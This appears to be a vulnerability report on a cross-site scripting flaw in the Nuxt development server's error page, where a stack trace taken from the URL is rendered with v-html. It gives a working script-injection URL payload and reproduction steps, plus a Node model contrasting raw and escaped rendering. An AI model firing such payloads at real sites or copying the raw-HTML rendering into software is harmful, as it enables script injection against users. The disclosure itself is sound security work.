The development server unsafely renders the stack trace inside error pages. Because the stack trace can be supplied by the client, this can be exploited by sending a specially crafted request.
The error-dev.vue template in @nuxt/ui-templates uses the v-html directive to render the stack trace section of the error page, so the value is inserted as raw HTML rather than as escaped text. The relevant part of the template:

<h1 />
<p />
<div>
  <pre v-html="stack" />
</div>
This would normally not be an issue, because the stack comes from the server's own error. However, Nuxt also accepts the stack trace from a specially crafted URL.
Navigating to /__nuxt_error?stack=%0A<script>alert("xss!")</script>
produces XSS. The first line of the stack trace is removed before rendering (it is expected to be the "Error: message" line), hence the leading %0A: the newline becomes the discarded first line and the script tag is what gets rendered.
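The following is an added example, not code from Nuxt or from the original report. It is a small Node model of the behaviour described above: a handler for /__nuxt_error reads the stack from the query string, drops its first line, and renders the rest either as raw HTML (the v-html case) or HTML-escaped (the fix). The route name and the stack parameter are taken from the report; the helper names and the page skeleton are assumptions made for the example.

```javascript
// Added example, not Nuxt's own code: a minimal model of the dev error page
// described in the report. Route name and `stack` query parameter come from
// the report; helper names and the page skeleton are assumptions.

// Standard HTML escaping: what a text interpolation like {{ stack }} would do.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The report notes that the first line of the stack trace is removed before
// display; this helper models that step.
function stripFirstStackLine(stack) {
  return stack.split('\n').slice(1).join('\n');
}

// Vulnerable rendering: the equivalent of `<pre v-html="stack" />`.
function renderErrorPageUnsafe(stack) {
  return `<h1>Error</h1>\n<div><pre>${stripFirstStackLine(stack)}</pre></div>`;
}

// Hardened rendering: the stack is treated as text, never as markup.
function renderErrorPageSafe(stack) {
  return `<h1>Error</h1>\n<div><pre>${escapeHtml(stripFirstStackLine(stack))}</pre></div>`;
}

// Simulated dev-server handler: the stack is taken straight from the query
// string, as the report describes. Constructed model, not Nuxt's handler.
function handleRequest(requestUrl, render = renderErrorPageUnsafe) {
  const url = new URL(requestUrl, 'http://localhost:3000');
  if (url.pathname !== '/__nuxt_error') {
    return { status: 404, body: 'Not Found' };
  }
  const stack = url.searchParams.get('stack') || '';
  return { status: 500, body: render(stack) };
}

// Crude check: did attacker-controlled markup reach the page as markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed requests: the payload from the report, and the same payload
// without the leading %0A to show why the newline is needed.
const payload = '/__nuxt_error?stack=%0A<script>alert("xss!")</script>';
const payloadNoNewline = '/__nuxt_error?stack=<script>alert("xss!")</script>';

console.log('v-html, with %0A   :', handleRequest(payload).body);
console.log('v-html, without %0A:', handleRequest(payloadNoNewline).body);
console.log('escaped, with %0A  :', handleRequest(payload, renderErrorPageSafe).body);
```

Run with `node` to see the three renderings side by side. Without the leading newline the whole payload is the "first line" and is discarded, so no markup survives; with it, the raw rendering emits the script tag verbatim while the escaped rendering emits only `&lt;script&gt;` text, which the browser will not execute.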
https://stackblitz.com/github/nuxt/framework/tree/main/examples/essentials/hello-world?file=app.vue&theme=dark
Navigate to the URL /__nuxt_error?stack=%0A<script>alert("xss!")</script> on the running dev server; the alert fires.